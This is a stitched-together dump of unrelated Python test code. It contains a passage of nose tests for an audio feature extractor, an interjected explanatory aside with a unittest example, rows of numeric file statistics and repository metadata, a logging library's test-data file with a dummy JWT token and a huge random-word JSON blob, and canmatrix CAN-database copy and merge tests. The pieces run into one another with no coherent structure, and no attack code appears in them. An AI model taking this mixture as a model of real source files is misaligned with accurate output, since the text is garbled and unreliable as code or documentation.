    nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)

    # MFCC - delta
    extractor_name = 'mfcc_delta'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mfcc': {
                'n_mfcc': 12
            }
        }
    )
    nose.tools.eq_(len(feature_repository), 1)
    nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])

    # Meta
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
    nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_method'], 'mfcc')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_parameters']['n_mfcc'], 12)

    # Stat
    nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])

    # Feat
    # Shape
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
    nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)

    # MFCC - acceleration
    extractor_name = 'mfcc_acceleration'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mfcc': {
                'n_mfcc': 12
            }
        }
    )
    nose.tools.eq_(len(feature_repository), 1)
    nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])

    # Meta
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
    nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_method'], 'mfcc')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_parameters']['n_mfcc'], 12)

    # Stat
    nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])

    # Feat
    # Shape
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
    nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)

    # MEL
    extractor_name = 'mel'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mel': {
                'n_mels': 10
            }
        }
    )
    nose.tools.eq_(len(feature_repository), 1)
    nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])

    # Meta
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
    nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mels'], 10)

    # Stat
    nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])

    # Feat
    # Shape
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 10)
    nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].shape[1], 10)

    # MFCC (extractor name inferred from the parameters only)
    extractor_name = 'mfcc'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_params={
            'mfcc': {
                'n_mfcc': 12
            }
        }
    )
    nose.tools.eq_(len(feature_repository), 1)
    nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])

    # Meta
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
    nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
    nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mfcc'], 12)

    # Stat
    nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
    nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])

    # Feat
    # Shape
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
    nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
    nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)


def test_save():
    extractor_name = 'mfcc'
    feature_repository = FeatureExtractor(store=True, overwrite=True).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mfcc': {
                'n_mfcc': 10
            }
        },
        storage_paths={
            'mfcc': os.path.join('material', 'test.mfcc.cpickle')
        }
    )


@raises(ValueError)
def test_wrong_extractor():
    extractor_name = 'mf'
    feature_repository = FeatureExtractor(store=False).extract(
        audio_file=os.path.join('material', 'test.wav'),
        extractor_name=extractor_name,
        extractor_params={
            'mfcc': {
                'n_mfcc': 10
            }
        }
    )
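The last test uses nose's `@raises(ValueError)` decorator to assert that an unknown extractor name fails. The same expectation can be written with the standard library alone; the `extract` function below is a hypothetical stand-in for illustration, not the real `FeatureExtractor.extract` API:

```python
import unittest


def extract(extractor_name):
    """Hypothetical stand-in that rejects unknown extractor names."""
    known = {'mfcc', 'mfcc_delta', 'mfcc_acceleration', 'mel'}
    if extractor_name not in known:
        raise ValueError('Unknown extractor: %s' % extractor_name)
    return {extractor_name: {}}


class TestWrongExtractor(unittest.TestCase):
    def test_wrong_extractor(self):
        # stdlib equivalent of nose's @raises(ValueError)
        with self.assertRaises(ValueError):
            extract('mf')

    def test_known_extractor(self):
        # a valid name should come back as the repository key
        self.assertEqual(list(extract('mfcc').keys()), ['mfcc'])


result = unittest.TextTestRunner(verbosity=0).run(
    unittest.TestLoader().loadTestsFromTestCase(TestWrongExtractor))
```

`assertRaises` as a context manager also exposes the raised exception via `cm.exception`, which is handy when the error message itself needs checking.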
| 38.160976 | 131 | 0.670203 | 972 | 7,823 | 5.12963 | 0.075103 | 0.185118 | 0.245086 | 0.282792 | 0.913558 | 0.909146 | 0.909146 | 0.898115 | 0.898115 | 0.896911 | 0 | 0.022167 | 0.169628 | 7,823 | 204 | 132 | 38.348039 | 0.745382 | 0.023648 | 0 | 0.661972 | 0 | 0 | 0.09833 | 0.005521 | 0 | 0 | 0 | 0 | 0.105634 | 1 | 0.021127 | false | 0 | 0.056338 | 0 | 0.077465 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a771b62734b3fedcc8871b18d73caada634c4082 | 29,385 | py | Python | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 AccelByte Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
TEST_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJiYW5zIjpbXSwiY2xpZW50X2lkIjoiMDAwMDAwMDAwMDAwMCIsImNvdW50cnkiOiJJRCIsImRpc3BsYXlfbmFtZSI6InRlc3QiLCJleHAiOjE2MjM5OTU0NzgsImlhdCI6MTYyMjY3NTQwNiwiamZsZ3MiOjEsIm5hbWVzcGFjZSI6InRlc3QiLCJuYW1lc3BhY2Vfcm9sZXMiOlt7Im5hbWVzcGFjZSI6InRlc3QiLCJyb2xlSWQiOiIwMDAwMDAwMDAwMDAwMDAwMDAifSx7Im5hbWVzcGFjZSI6InRlc3QiLCJyb2xlSWQiOiIxMTExMTExMTExMTExMTExMTEifSx7Im5hbWVzcGFjZSI6ImFjY2VsYnl0ZSIsInJvbGVJZCI6IjIyMjIyMjIyMjIyMjIyMjIyMjIifSx7Im5hbWVzcGFjZSI6IioiLCJyb2xlSWQiOiIzMzMzMzMzMzMzMzMzMzMzMzMzIn1dLCJwZXJtaXNzaW9ucyI6W10sInJvbGVzIjpbIjAwMDAwMDAwMDAwMDAwMDAwMCIsIjExMTExMTExMTExMTExMTExMSIsIjIyMjIyMjIyMjIyMjIyMjIyMjIiLCIzMzMzMzMzMzMzMzMzMzMzMzMzIl0sInNjb3BlIjoiYWNjb3VudCB0ZXN0Iiwic3ViIjoiMTIzNDU2Nzg5MTAiLCJqdGkiOiIwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCJ9.IAdBig0pdLbUBlBDBeYQzoORzREpW5XcwM1TkUR0J7Q"
TEST_CONTENT_TYPE = 'application/json'
TEST_INVALID_CONTENT_TYPE = 'application/javascript'
TEST_RESPONSE_BODY = b'{\n "x": [\n "2022-01-04T00:00:00Z",\n "2022-01-05T00:00:00Z",\n "2022-01-06T00:00:00Z",\n "2022-01-07T00:00:00Z",\n "2022-01-08T00:00:00Z",\n "2022-01-09T00:00:00Z",\n "2022-01-10T00:00:00Z",\n "2022-01-11T00:00:00Z"\n ],\n "y": [\n 3075,\n 2641,\n 1941,\n 3236,\n 1613,\n 1804,\n 2852,\n 121\n ]\n}'
TEST_RESPONSE_BODY_RESULT = '{"x":["2022-01-04T00:00:00Z","2022-01-05T00:00:00Z","2022-01-06T00:00:00Z","2022-01-07T00:00:00Z","2022-01-08T00:00:00Z","2022-01-09T00:00:00Z","2022-01-10T00:00:00Z","2022-01-11T00:00:00Z"],"y":[3075,2641,1941,3236,1613,1804,2852,121]}'
TEST_REQUEST_BODY = b'{\n "id":"connector--analytics_game_telemetry--dev--s3",\n "testing":true,\n "name":"game-telemetrydev"\n}'
TEST_REQUEST_BODY_RESULT = '{"id":"connector--analytics_game_telemetry--dev--s3","testing":true,"name":"game-telemetrydev"}'
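The `*_RESULT` constants above are the compact renderings of the pretty-printed `*_BODY` payloads. That normalization can be reproduced with the standard library by parsing and re-serializing without whitespace (the `body` variable below is an illustrative payload in the same shape as `TEST_REQUEST_BODY`):

```python
import json

body = b'{\n    "id":"connector--analytics_game_telemetry--dev--s3",\n    "testing":true,\n    "name":"game-telemetrydev"\n}'

# parse the pretty-printed bytes, then re-serialize with no whitespace
# between tokens; separators=(',', ':') drops the default spaces
compact = json.dumps(json.loads(body), separators=(',', ':'))
print(compact)
# -> {"id":"connector--analytics_game_telemetry--dev--s3","testing":true,"name":"game-telemetrydev"}
```

Comparing compact forms makes body assertions insensitive to indentation and line breaks in the original payload.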
TEST_LARGE_DATA = b'{"beyond":{"if":2129835697.5730796,"remove":1794436353,"food":false,"clean":[{"weight":true,"silence":["cross","replace",false,-499849023,false,"late",955174835,1842778758.5261354,false,915538733.8679276,{"newspaper":false,"say":244418524,"mysterious":false,"mother":false,"even":-646116108,"sound":-1208221145,"doubt":[-845874835.9017024,["tribe",false,"hide",false,[false,[true,[[true,{"have":false,"central":963242665,"manner":-1520269867.6617684,"wear":796206239,"fifth":[{"somewhere":[{"return":["bat",true,[27945117,[false,"calm",["two",{"ourselves":{"measure":-372132515.7172165,"silent":{"give":336996906.14272976,"pure":true,"task":true,"were":true,"hidden":["blue",[-1328794856,false,[394683803,-779500286.5659609,true,"pencil",{"dot":false,"which":{"owner":false,"light":-1608391762.9962125,"composition":{"inch":"cage","learn":[{"else":{"dug":-330868370.1722536,"not":[60445955.203523636,"command",false,{"let":[false,"heavy",2110409060,[[{"through":1927039625.0686312,"count":"birthday","minerals":{"appearance":1497453832,"look":{"mouse":{"divide":[true,true,"biggest",1372026453,{"instead":{"canal":["mixture","just",false,false,"flag",true,{"gold":false,"bound":"captured","government":{"pleasure":{"park":true,"clay":"nervous","attack":"few","cost":"am","out":true,"thread":[["making",{"oldest":"similar","kept":{"not":[-1158199226,true,true,[false,-2048675764,{"material":"spread","to":{"congress":{"consider":-1437423742.0975595,"pot":true,"few":{"date":{"pet":{"west":"growth","give":-1691404955,"negative":false,"result":"wife","lie":{"one":false,"cast":[true,1275938924,-1136879911.273982,217406388,{"feature":136157952.27465868,"tiny":["eat",{"uncle":[true,["wave","therefore",12168483.271469593,false,44472354.64633131,true,"motor",false,{"doing":[["drive",-624569149,false,[["song",false,"dug",[[[false,"paid",[{"dozen":{"still":"hill","mud":1767126105,"knew":["atomic",true,["daughter","noon","finger",false,["force",[-1872931000,"hard",true,[1080538941,
"queen",{"finish":"would","they":"bee","proud":{"western":false,"struggle":-1953936283,"higher":{"giving":{"herd":true,"wherever":840864885.4918156,"airplane":{"monkey":198354822,"rocket":-2058970024,"meet":"separate","quarter":{"correctly":-2013713226.8475766,"coal":{"running":[["is",[true,true,783894877.0924335,{"fear":{"mysterious":{"its":[[[false,"hair","differ",-287840297.4288955,"writer","than","felt",false,899090744.0876045,-797703863.7439446,"machinery",true,"happened","popular",false,false,"front",true,false,"income"],1174145877,true,-1787058932,166736953.48384094,false,1055933509.3530307,"important",-607722463.2608457,1650661337.0898137,"recall",false,"either","position","thank","different",true,-1735299999,true,-56149986.62072086],381027003,"post",true,true,"interest","ten",true,false,387939792,"sell",1093486116,729978952.3640637,"silent",true,false,true,-1735669592.5094166,1831177259,"recall"],"key":"truth","type":1049824873.3636742,"yet":1507673434,"strength":254901664,"bottle":1486553428,"army":"unless","bring":false,"jet":false,"needed":"take","deer":"birth","swam":801817069,"active":true,"brought":"future","gift":"ring","should":-2034265638.896184,"potatoes":-516196722,"blind":"cotton","memory":"ability","notice":true},"high":true,"idea":"rubbed","private":1927401693.5995932,"follow":447512187.3036394,"brush":"research","am":true,"chosen":"monkey","dog":"chosen","opposite":false,"might":true,"pair":"sense","flat":true,"hurt":"shelter","physical":1069851933.5764289,"natural":-1287169612.4078636,"truth":false,"breath":true,"charge":"meet","office":false},"clear":true,"highest":"unknown","family":-343283092.8539982,"physical":452896678,"balloon":false,"teeth":"that","equipment":true,"birds":-1695411777.2602134,"farm":802762490,"whole":true,"raise":1584347800.218967,"dead":-1093711500,"fresh":1987742063,"everyone":1126650957,"difference":1660149276,"please":1655707846.331164,"program":-1300396028,"pie":true,"tent":"slight"},false,"railroad",false,-195407
1922.8468995,"blood","product","might","guess","habit",false,-1543894746,true,false,true,-1612319639,true],"border",true,1747493845.586399,-1769807196.3550725,"aid",false,"gone",true,"wave","sky",1382754008.2223487,"exercise",-1936157055.9483376,"choose",false,"real",-19886635,true],-1519034308,true,false,"depth",1138545813.1192842,"world",false,"south",-1238699455,"contrast",false,-2130379884.3977532,false,-1146779480.9603496,false,false,false,-811754493.7324934,621309736.0268555],"beside":1796768318,"brother":false,"plenty":false,"become":-1916886481,"parts":"nearer","wagon":false,"quickly":-780770116,"furniture":"window","railroad":"stood","universe":"review","quick":1265574859.0069265,"yesterday":false,"brush":430053894.42572165,"play":"became","finger":884619633.5356283,"satisfied":true,"produce":"exercise","worth":-423679789,"lack":-799792586.9356813},"noted":-631737229.8779964,"globe":"air","order":false,"copy":-1318995917,"at":false,"table":-48856287.78857899,"willing":2071508389.714118,"structure":"ship","winter":-2051748968.5781221,"six":"by","one":"rocky","facing":false,"orbit":"stage","actual":"fact","amount":1006834361,"thirty":"settle","happily":true},"shot":1711747945,"condition":false,"safe":true,"hurt":1274839043,"actual":true,"thin":"weight","house":-1687449646.1661205,"seed":"stove","burn":"free","river":false,"wrapped":101021638,"bread":738369879.0745091,"east":-787925402.3702745,"seldom":"ourselves","cloth":"represent","ride":false},"dream":1320470285,"climb":"down","obtain":"instrument","taken":1101622665.0513973,"still":"distance","sick":-1898907332,"suit":-1578218110.7565722,"smoke":"nor","food":"flow","facing":-84155668,"claws":-1973709649.370142,"twice":true,"motion":"everybody","conversation":829995096.5686278,"rush":"brave","began":true,"industrial":"tales"},"slipped":"express","stage":"cotton","burn":false,"clothes":1098869462.520844,"limited":"plural","whatever":"herd","pack":false,"mail":"stairs","plain":-1352285619,"silence":"door","n
ose":"halfway","settlers":false,"upon":1750606709,"child":"adjective","meat":1295864979.2971945,"hit":"load","doctor":-1561339823,"ask":true,"he":"common"},"selection":"slabs","never":-600607603,"glass":-908202749.3040614,"tool":false,"cutting":"stream","swam":true,"graph":"few","local":true,"whatever":true,"below":-989213528,"catch":false,"enjoy":"being","crowd":true,"promised":false,"at":-704118982.164917,"properly":1507440079.860363},"together":true,"division":"funny","private":-392272974,"lake":"rhyme","beyond":false,"compound":186043150.12913942,"date":"children","damage":"nearly","particularly":"wall","tropical":"age","tried":false,"leaf":"foot","somehow":true,"name":729537077.9729562,"left":-2090773707,"move":"right","method":true},false,-130590695.90715075,2349024,"never","wonder",2092550687,"ancient","military",false,"care",-1429304484,false,false,true,"collect",2130984134.1470447,1169158198],false,false,"many",-1843552333.330696,"fierce","white",-1420754004.0557528,-2008297409,"own",-1854116686.7720723,-1767943155,-1710684735.0563602,191968179,"at","occur",-1903126884.3334684],true,"sight",1664806633.9433074,"queen",true,"tears",550540971,"answer",-1786952806.2961583,false,true,"minute",true,"firm",true,"play",false,"page"],"nodded",true,false,false,-400275696.39848757,false,true,"grandfather",true,1201805460.493123,-852255891.5663724,true,"smile",-1987481108.553391,"guide"],"generally",true,false,true,-1865767483.9188848,"secret","soon",true,-914794357,false,"happy","play",-373509599.16906404,"fourth","bad",false,"specific"],"relationship":"space","one":"television","needs":1716182871,"against":true,"prove":-832994665,"carbon":"strike","near":"wore","could":"thousand","height":"driven","pull":false,"trade":false,"signal":2020175719,"fourth":1921728002,"black":true,"travel":"chose","station":true,"children":-509970994},"wonder":"tower","bent":false,"sing":-1134253041,"band":true,"fairly":true,"bat":1156586640.0220146,"balance":false,"silly":false,"copy":-8
51794698,"gradually":-524917515,"effect":false,"brick":"different","respect":false,"electricity":false,"stock":false,"prize":-784608456.674727,"move":false,"lie":true,"beginning":false},"carefully","table","famous",-774737921,false,true,true,1702716052.4939494,439206179.5006957,1475981631,true,"course","torn","musical","tobacco",false,"pack","spider","bread"],"between",true,true,"situation",true,1500742566.9625635,true,true,"stood",-162320723,-1507117232,-634421503.174295,548830139,"independent",-841361415,-150677849,false],"protection",1297263299.7442217,"mass",false,"balloon",false,true,"drew",true,"run",-534625814,"willing","outside",true,"certainly",true,-839893671.0998306,false,"cap"],1508391079.6116104,"effort",-1476003519,2124826272.6451883,-1775873940,-1566250611.0590677,240936079,false,"plenty","similar","hello",false,-703626630.7107,"blanket",-1593612362.3064518,false,-1615194724.7489605,"century","dog"],true,-315934274,4391550.609623909,374192753.7703824,false,false,"fire",264290219,true,true,-645446302.0169816,"morning","giant",602438923.7565851,false,"winter"],true,false,-2001615518,"forest",-882607001.1451616,-58894120,false,610126110.4988613,1735624262,"faster","pocket",true,"pain",-1213738916,118192864,true,"wonder","musical",true],false,-1641937516.1508512,"rather","thee",665277805.2117853,true,-816532895.3171797,true,354642474.8931198,true,-1821509046,"apart",-1056827913,false,"mad","cast"],false,1233678345,false,false,false,"serve","curve",true,"she",true,true,980316185.7327733,true,false,false,false,true,"claws","car"],"brought":"still","camera":2078645226.6381855,"complete":"herd","roar":-734845028,"source":"news","wherever":true,"merely":1295983269.1350121,"brick":68839038.13307238,"lonely":294952140,"fellow":"current","will":2089116877.1146312,"shoe":-797146239,"bit":380261181.9263091,"fierce":"applied","passage":false,"paid":true,"sugar":"chamber","by":false,"suggest":false},1476111560.0083323,-1934686900,-268104772,"cotton","greatly",true,"c
omplex",true,false,"traffic",-1072861369.857049],1250530523.1505895,"got","meet",1727055016.1805687,false,"asleep","original","funny",1264504857,-1793345555.6048331,"mathematics",1417829344.7583795,"valley","get",false,false,"numeral",false],"army":-814561918,"warm":"vowel","football":-211944206,"flew":"shown","known":-512448563,"musical":"lying","doing":"some","not":"example","grade":"sweet","hole":"where","difference":319845544,"vast":2095990079,"wait":-1358200618.8524513,"fresh":true,"fifteen":true,"weather":"eleven","numeral":false,"face":true,"cutting":false},true,"couple",904198024,"tea",true,-1292583679,-867280595.5645237,2025299353.5327177,false,"whom",2105012813,-1613166988,1598247982,false,false,false,false,true],"crack":true,"mark":false,"personal":-379627686.29684305,"shallow":false,"flat":267925739,"upon":"lot","occasionally":-190643355.90591526,"put":1648287491,"satellites":true,"arrive":true,"current":"stranger","paper":false,"here":true,"heart":"call","property":true,"you":true,"grabbed":-489715420.61424875,"chosen":true},1815759369,false,true,"strength","connected",778561562.6922975,811557121.7078152,"again",-104824769.20491838,true,false,true,false,"simple",true],"solar":-1153196500,"grabbed":"telephone","liquid":420972528,"famous":true,"once":"shot","can":-1809708958,"car":-1909578295.1774416,"take":"home","cent":1270816749.9329305,"essential":false,"newspaper":"mixture","whether":421857444,"cup":true,"across":"ride","correctly":264138807.6979313,"idea":true,"rock":455917578.784863,"mouse":"breathing"},"pour":726123409,"behavior":693372528.8339195,"fall":1566548696.7091346,"organized":717685753,"older":false,"condition":743647136,"pile":-267587881,"life":824924784.6123877,"topic":1300268575,"prepare":true,"younger":false,"rule":950344093,"minute":"mad","couple":"hollow","strong":"city"},"ear":true,"not":-590282226.5932918,"composition":"flight","office":-1755118502,"poor":"different","mail":-1127219757.167788,"push":-346793569,"practical":-1075393
34.1155572,"blow":true,"therefore":"send","arm":"complete","second":true,"fewer":-490507671.510715,"bring":"spent","seen":"wealth","effort":563832146.9645524,"whose":"trouble","needs":"tears","though":false},"avoid":-268541426.72947264,"grown":1340978945,"answer":true,"hidden":true,"program":"pie","drove":-2048544098.499269,"connected":-17859598,"daughter":"flew","now":false,"us":false,"dry":"fuel","office":"available","perfectly":false,"thought":false,"ocean":415805426,"private":true,"gold":2061060161,"nor":"officer","experience":-2079652264},"tell":"rather","lion":-1519874831.1412659,"continued":false,"gave":"root","green":"slave","afraid":"farther","been":true,"distant":2084210995,"coast":"farm","cage":-95753471.14638948,"diameter":1023244440,"chemical":982682670.4079657,"thumb":-110984318,"middle":-1492440423.7898378,"solar":"tell","plural":false,"seeing":1685599829},"straw":-337217046,"meet":true,"fifty":true,"parallel":true,"swing":"disease","lovely":"sport","lose":1798397736,"for":false,"bet":1968649350.4558558,"clothes":"gather","animal":true,"serious":false,"near":56714106.01041412,"uncle":"knew","square":858132366,"entire":"particles","immediately":"been","tight":false,"leather":"hill"},"park":-104461279.38594723,"battle":"during","ready":-1042339605,"seen":false,"wet":true,"throw":"growth","everybody":false,"table":34620308,"escape":897422213.5830412,"neighborhood":1202624059,"twelve":"sail","of":642071438,"famous":true,"animal":false,"hungry":"industry","made":true,"lunch":-1449536637.0398269,"pony":"power"},-1645265045,-1167645971.9001746,-1425583474.6966662,"atmosphere","cool","to",true,-88539330.69405508,"gun",true,-1006179778.9819007,false,150263187,"flight","no","score","curious"],-1585319192.672923,266558411,-119967391.43621397,"differ","hole",false,true,-1085748315.1468105,"money",false,-1222416556,-1292452888.6735067,-1301732942.9680037,true,false,true],"dinner":false,"east":true,"material":"center","include":"any","army":true,"fat":false,"led":-
1769307036,"sugar":583844034,"disappear":true,"naturally":"mainly","molecular":-2133256227.106648,"shape":false,"tent":"smallest","sand":-1146328992,"fellow":-1439504051,"search":false,"again":-637065975.397129,"science":false,"exchange":-570613220.1083388},"shaking":1683111888.1853461,"above":-394691806.50876474,"mass":false,"recent":-1070309016.5627728,"attached":-1854288736.906733,"sang":1513491998,"wrong":false,"broken":-885406013,"all":false,"iron":1845035701.2311025,"mirror":true,"voice":"nearer","early":true,"condition":false,"bank":-264684432.19425678,"west":true,"late":"return","industrial":false},-530379412.2669134,true,-1048168168.2565804,"continent",true,"send",true,"mountain","rocky","worry",1037694027.5237236,"real","anything",false,"bound",false,"magnet",false],false,false,-1374350813,false,true,1714868623.7048535,true,"mood",1909886575,1820218127,-1752101903.3037448,1051590049,-941196318,false,-246571470.9200635,"laid",false,true,721274900.2753239],"question":true,"discover":false,"alone":"bridge","mostly":-657952415.409296,"police":"alphabet","recent":true,"lion":"stretch","buffalo":805394525.7574973,"street":false,"her":true,"trunk":false,"cabin":-120567505.19616032,"rhyme":-1651516516.5440774,"memory":"each"},"sent":"step","exactly":"solve","shaking":true,"prove":"page","build":"smaller","worth":"buy","limited":-1789792386,"try":true,"greatly":384237493,"will":false,"block":true,"plus":"sheet","cream":-1037934787.2098703,"these":"buffalo","air":771119747,"son":725003267.47191,"freedom":false,"factor":false,"goose":1881544973},"continent":true,"accept":true,"poetry":true,"appropriate":-692928029,"cover":-1081319175.4374657,"tin":194939169,"flies":"shade","people":"headed","tie":true,"must":false,"effort":false,"leg":false,"whistle":"pile","individual":"although","surrounded":"environment","wish":"obtain"},false,"unless","paint",true,false,"fine",710750926,"experiment",true,-1577912959.6179066,-1413554389,false,"soap"],"climb":false,"tail":"structur
a7a94f298fc986a8008b8e890785cf40abc614bb | 2,749 | py | Python | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | 1 | 2019-11-11T07:38:33.000Z | 2019-11-11T07:38:33.000Z | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | null | null | null | src/canmatrix/tests/test_copy.py | sky-dream/canmatrix | c5e17bc4fe42ce8ed8d67a3a9ef41a63509d9b6a | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import canmatrix.canmatrix
import canmatrix.copy
def test_merge():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2)
matrix2.add_frame(frame2)
matrix1.merge([matrix2])
assert len(matrix1.frames) == 2
def test_copy_ecu_with_frames():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters=["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
canmatrix.copy.copy_ecu_with_frames("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 2
assert len(matrix1.ecus) == 1
def test_copy_ecu_without_frames():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters=["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
matrix2.add_ecu_defines("attrib", "STRING")
matrix2.ecu_by_name("ECU").add_attribute("attrib", "attribValue")
canmatrix.copy.copy_ecu("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 1
assert len(matrix1.ecus) == 1
assert matrix1.ecu_by_name("ECU") is not None
def test_copy_ecu_with_attributes():
matrix1 = canmatrix.canmatrix.CanMatrix()
frame1 = canmatrix.canmatrix.Frame("Frame1", arbitration_id=1)
frame1.add_signal(canmatrix.canmatrix.Signal("SomeSignal"))
matrix1.add_frame(frame1)
matrix2 = canmatrix.canmatrix.CanMatrix()
frame2 = canmatrix.canmatrix.Frame("Frame2", arbitration_id=2, transmitters=["ECU"])
matrix2.add_frame(frame2)
matrix2.update_ecu_list()
matrix2.add_ecu_defines("Node Address", "INT 0 255")
matrix2.add_ecu_defines("attrib", "STRING")
matrix2.ecu_by_name("ECU").add_attribute("attrib", "attribValue")
matrix2.ecu_by_name("ECU").add_attribute("Node Address", 42)
canmatrix.copy.copy_ecu("ECU", matrix2, matrix1)
assert len(matrix1.frames) == 1
assert len(matrix1.ecus) == 1
assert matrix1.ecu_by_name("ECU") is not None
assert matrix1.ecu_by_name("ECU").attribute("Node Address") == 42
